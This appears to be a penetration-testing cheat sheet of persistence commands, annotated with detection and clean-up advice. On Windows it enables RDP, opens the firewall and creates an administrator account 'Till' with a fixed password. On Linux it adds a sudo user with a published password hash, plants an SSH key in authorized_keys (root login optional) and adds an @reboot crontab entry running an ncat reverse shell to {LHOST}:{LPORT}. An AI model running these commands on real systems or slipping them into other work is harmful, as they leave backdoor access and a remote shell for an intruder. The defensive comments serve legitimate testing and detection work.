Persistence
Windows
REM Enables inbound RDP, opens the host firewall for it, and creates a local administrator account.
REM Defender view: with account-management auditing enabled, the account creation and the two group
REM additions show up as Security events 4720 and 4732; the registry value and firewall rule group
REM below are worth baselining and alerting on.
REM Engagement hygiene: a fixed, widely known username/password leaves a guessable administrator
REM reachable over RDP for as long as it exists. Record each change and revert all of them at
REM close-out (delete the user, restore fDenyTSConnections, disable the rule group).

REM fDenyTSConnections = 0 allows incoming Remote Desktop connections.
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
REM Enables the built-in "remote desktop" Windows Firewall rule group.
cmd /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
REM Creates local user "Till". The password is a command-line argument, so it is captured by
REM process-creation logging where command lines are recorded (event 4688, Sysmon event 1).
cmd /c net user /add Till P@ssw0rd
REM Grants the new account local administrator rights.
cmd /c net localgroup Administrators /Add Till
REM Grants the new account permission to log on via RDP.
cmd /c net localgroup "Remote Desktop Users" /Add Till
# Run from the tester's machine: opens an RDP session to {RHOST} as the account created above.
# -k de-ch selects the Swiss-German keyboard layout; adjust to the local keyboard.
# NOTE: -p with a literal password exposes it to other local users via `ps` and stores it in
# shell history; `-p -` makes rdesktop read the password from standard input instead.
rdesktop -k de-ch -u 'Till' -p 'P@ssw0rd' {RHOST}
Linux
Add Super User
# Generate your own PW with: `openssl passwd -crypt 'P@ssw0rd'`
# NOTE(review): -crypt yields a legacy DES-crypt hash, which only uses the first 8 characters of
# the password and is cheap to crack once /etc/shadow is read. The option is reportedly gone from
# OpenSSL 3.0 onwards - confirm on your version.
# The hash below is presumably the DES-crypt of the sample password; it is a published value, so
# an account created with it unchanged is effectively a known credential.
#
# useradd flags: -p sets the pre-hashed password, -s the login shell, -d/-m create the home
# directory, -G sudo adds the account to the sudo group.
# Defender view: this adds entries to /etc/passwd, /etc/shadow and /etc/group; file-integrity
# monitoring or auditd watches on those files, plus review of sudo group membership, will surface it.
# The account has to be removed again at the end of the engagement.
sudo useradd -p wNlg41ZQYB2nQ -s /bin/bash -d /home/till -m -G sudo till
SSH Keys
# If you haven't done so already, prepare your ~/.ssh/id_rsa.pub on Kali:
# (ssh-keygen without arguments prompts for the key file location and a passphrase.)
ssh-keygen
# Generate the command to type into the target:
# This only prints a command line with the tester's PUBLIC key embedded; nothing is changed
# locally, and the private key never leaves the tester's machine.
echo -e "echo '$(cat $HOME/.ssh/id_rsa.pub)' >> ~/.ssh/authorized_keys"
# Absolute Path: /home/{USER}/.ssh/authorized_keys
# Absolute Path: /root/.ssh/authorized_keys
# Maybe: echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config && service sshd restart
# NOTE(review): the PermitRootLogin change affects every root login on the host, not just the
# planted key, and stays in place until sshd_config is restored.
# Defender view: unexpected entries in authorized_keys (including root's) and edits to
# sshd_config are the artefacts to look for; both files are good file-integrity monitoring targets.
# If ~/.ssh/authorized_keys doesn’t exist on target:
# Creates the directory and key file with the restrictive modes sshd expects: with StrictModes
# on, sshd ignores key files whose ownership or permissions are too open.
mkdir ~/.ssh
chmod 700 ~/.ssh
touch ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Needed when the files were created by a different user (e.g. root) than the account owner;
# {USER} is a placeholder for that account.
chown -R {USER}:{USER} /home/{USER}/.ssh/
# Use the key
# Run from the tester's machine; -i selects the private key matching the public key added on the
# target. {RUSER} and {RHOST} are placeholders for the remote account and host.
# Defender view: the resulting login is recorded by sshd as a public-key authentication for that
# account, so key-based logins from unfamiliar source addresses are worth alerting on.
ssh -i ~/.ssh/id_rsa {RUSER}@{RHOST}
Crontab
# Appends an @reboot entry to the current user's crontab: 200 seconds after each boot it runs
# ncat, connecting out to {LHOST}:{LPORT} with /bin/bash attached to the connection (-e).
# NOTE(review): the resulting shell is unauthenticated and unencrypted, and the entry survives
# reboots until it is removed from the crontab - track it for close-out.
# Defender view: audit per-user crontabs (`crontab -l -u USER`, files under /var/spool/cron; the
# exact path varies by distribution) for @reboot lines and for ncat/nc invoked with -e, and alert
# on outbound connections from cron child processes.
(crontab -l ; echo "@reboot sleep 200 && ncat {LHOST} {LPORT} -e /bin/bash")|crontab 2> /dev/null
Relevant Note(s): Penetration Testing